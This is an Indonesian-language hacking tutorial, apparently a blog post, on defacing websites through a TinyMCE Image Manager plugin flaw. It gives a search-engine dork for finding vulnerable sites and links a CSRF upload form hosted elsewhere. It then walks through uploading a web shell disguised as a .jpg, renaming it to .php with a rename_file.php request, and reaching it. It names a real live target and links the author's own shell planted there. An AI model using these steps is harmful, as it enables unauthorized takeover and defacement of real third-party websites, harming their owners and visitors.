Ok kali ini gw share deface POC TinyMce Plugins Image Manager
caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpg
Ok langsung aja
DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )
Exploit : site.com/(path)/tinymce/plugins/image/upload.php
Live Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php
1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih
2. site yg vuln seperti ini
Vuln tidak juga ada yg seperti itu, ada juga yg blank seperti ini
3. Selanjutnya salin url nya, upload shell menggunakan CSRF nya ada di sini http://trolling-system.ooo/csrf.txt kalian upload di web dengan nama csrf.php
4. Upload extensi shell .jpg , inget jangan langsung upload ext .php, upload menggunakan csrf di atas yg gw kasih, ubah bagian <form action="site.com" dengan web yg vuln
5. lalu upload shell ext jpg nya, kalau sukses muncul seperti ini
6. Nah kalau muncul sepeti ini salin tulisan FILE-20180702-0754DCWUCH8NHQFC.jpg nah yang kaya gitu
7. Lalu kita disini mengubah shell jpg kita menjadi php, gimana caranya? sans ikutin
http://site.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php
Ga ngerti? ok contoh seperti ini
8. kalau success muncul tulisan banyak seperti ini
9. tinggal kita akses deh
akses shell : site.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php
look >> https://www.madisonts.com/js/tinymce/plugins/image/uploads/bacot.php nah ini shell gw
mudah bukan? eheheh
ada yang masih kurang ngerti? Jangan ragu untuk bertanya
Ok sekian..
terima kasih sudah berkunjung